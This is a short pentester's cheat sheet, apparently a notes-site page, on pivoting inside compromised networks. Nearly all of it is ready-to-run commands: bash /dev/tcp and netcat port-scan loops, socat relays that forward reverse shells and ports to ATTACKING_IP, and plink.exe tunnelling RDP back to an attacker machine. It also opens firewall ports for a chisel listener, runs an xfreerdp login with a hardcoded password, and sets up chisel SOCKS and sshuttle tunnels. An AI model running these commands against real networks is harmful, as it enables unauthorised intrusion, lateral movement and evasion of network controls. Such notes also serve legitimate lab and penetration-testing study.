Pivoiting

DNS RECORDs

$ nmcli dev show.

bash port scan

$ for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open; done


for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done

for i in $(seq 4800 4900); do nc -zv -w 1 172.16.208.217 $i; done

socat

 //Reverse Shell Relay
 nc -lvnp 443
./socat tcp-l:8000 tcp:ATTACKING_IP:443 &

Port Forwarding -- Quiet

socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &

./socat tcp:ATTACKING_IP:8001 tcp:TARGET_IP:TARGET_PORT,fork &

plink.exe

C:\Windows\Temp\plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4


cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N

Firewall add port

firewall-cmd --zone=public --add-port PORT/tcp

netsh advfirewall firewall add rule name="Chisel-MuirlandOracle" dir=in action=allow protocol=tcp localport=47000

Relay listner

 ./socat tcp-l:8000 tcp:ATTACKING_IP:443 &

xfreerdp /v:10.200.63.150 /u:getsystem /p:toor +clipboard /dynamic-resolution /drive:/opt/pivoting/Post-Exploitation,share

Chisel Forward SOCKS Proxy:

./chisel server -p LISTEN_PORT --socks5

to connect 
./chisel client TARGET_IP:LISTEN_PORT PROXY_PORT:socks

sshuttle

sshuttle -r user@172.16.0.5 --ssh-cmd "ssh -i private_key" 172.16.0.0/24 -x 172.16.0.5

Previousnetsh Pivoting rules NextBloodHound

Last updated 1 year ago

DNS RECORDs

bash port scan

socat

plink.exe

Firewall add port

Relay listner

xfreerdp share

Chisel Forward SOCKS Proxy:

sshuttle